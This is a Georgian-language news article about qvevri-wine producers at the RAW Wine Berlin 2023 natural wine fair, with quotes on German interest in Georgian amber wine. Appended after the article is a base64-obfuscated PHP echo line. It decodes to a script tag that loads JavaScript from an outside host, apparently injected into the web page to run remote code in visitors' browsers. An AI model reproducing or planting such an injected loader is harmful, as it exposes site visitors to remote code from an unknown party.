celsiusi
ავერსი საქკაბელი

 ბერლინში, ბუნებრივი ღვინოების საერთაშორისო გამოფენაში „RAW Wine Berlin 2023”, ღვინის ეროვნული სააგენტოს და გერმანიის ფედერაციულ რესპუბლიკაში საქართველოს სალეჩოს მხარდაჭერით, ქვევრის ღვინის მწარმოებელი 15 მარანი მონაწილეობდა. ამის შესახებ საინფორმაციო სააგენტო "ბიზნესთაიმს" ღვინის ეროვნული სააგენტოდან აცნობეს. 

„RAW Wine”  ერთ-ერთი გამორჩეული საერთაშორისო გამოფენაა, სადაც მაღალი ხარისხის ბუნებრივი, ორგანული და ბიოდინამიური ღვინოების მწარმოებლები იკრიბებიან. გამოფენის ორგანიზატორია ცნობილი ღვინის მაგისტრი საფრანგეთიდან იზაბელ ლეგერონი.  

„შესანიშნავია, რომ ქვევრის ღვინო სულ უფრო და უფრო პოპულარული ხდება საქართველოს ფარგლებს გარეთ; ადამიანები ეცნობიან ქვევრის ღვინის დამზადების ამ ტრადიციულ მეთოდს, რომელსაც თქვენ 8 ათასი წელია იყენებთ საქართველოში. აღსანიშნავია ღვინის ეროვნული სააგენტოს მხარდაჭერა მცირე მარნებისადმი. გერმანია და ცენტრალური ევროპა მცირე მარნებისთვის ძალიან მნიშვნელოვანი ბაზარია,  ყოველ წელს, აქ უფრო და უფრო მეტს იგებენ ქართულ ღვინოზე. აღსანიშნავია ის წარმატება, რასაც ევროპაში მიაღწიეთ პატარა ქვეყანამ, მეღვინეობის ასეთი დიდი რეპუტაციით. უკვე ნამდვილად იცნობენ ყურძნის ქართულ ჯიშებს ქისი, ხიხვი, საფერავი, იცნობენ ამ ღვინოებს და ქვევრის ღვინოს“, - აღნიშნა იზაბელ ლეგერონმა.
 
,,RAW Wine Berlin”- ზე ქართული ქვევრის ღვინის წარდგენა მნიშვნელოვანია ქვევრის ღვინის პოპულარიზაციის, ღვინის მწარმოებლების მიერ პოტენციური იმპორტიორების მოძიებისა და  ექსპორტის ზრდისთვის. 
 
გერმანელი სომელიეს და ღვინის ექსპერტის, ინგე მაინცერის (Inge Mainzer) შეფასებით, აღნიშნულ გამოფენაში ქართული მწარმოებლების მონაწილეობა ძალიან კარგი  შესაძლებლობაა ადგილობრივი მომხმარებლისთვის ქართული პროდუქციის გასაცნობად.
 
„გერმანულ ბაზარზე ძალიან ბევრ ადამიანს განსაკუთრებით აინტერესებს ქარვისფერი და ბუნებრივი ღვინოები. როდესაც ვსაუბრობ ქართულ ღვინოზე, ბევრი ადამიანი ამბობს, რომ დაინტერესებულია თქვენი ყურძნის ჯიშებით. ვფიქრობ, ერთ-ერთი პერსპექტივა, რომელიც საქართველოს აქვს გერმანულ ბაზარზე არის ორიენტირება ადგილობრივი ყურძნის ჯიშებზე, ქარვისფერ ღვინოზე, ასევე კლასიკურ მეთოდზე, ხარისხზე, რაც გამოარჩევს მას ღვინის საერთაშორისო ბაზარზე. ჩემი აზრით, არცერთ სხვას ქვეყანას მსგავის შესაძლებლობა არ აქვს“, - აღნიშნა ღვინის ექსპერტმა.
 
მიმდინარე წელს, ბერლინის გამოფენაზე 20 ქვეყნის 150 ბუნებრივი ღვინის მწარმოებელი იყო წარმოდგენილი. ტრადიციულად, ქართული ღვინის მიმართ ინტერესი დიდი იყო ღვინის პროფესიონალებისა და ვიზიტორების მხრიდან.
აღსანიშნავია, რომ ღვინის ეროვნული სააგენტოს მხარდაჭერით,  2023 წელს, ქვევრის ღვინის მწარმოებელი მარნები „RAW Wine“-ის გამოფენებში ნიუ-იორკში, კოპენჰაგენსა და ლოს-ანჯელესში მონაწილეობდნენ.
 
292
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");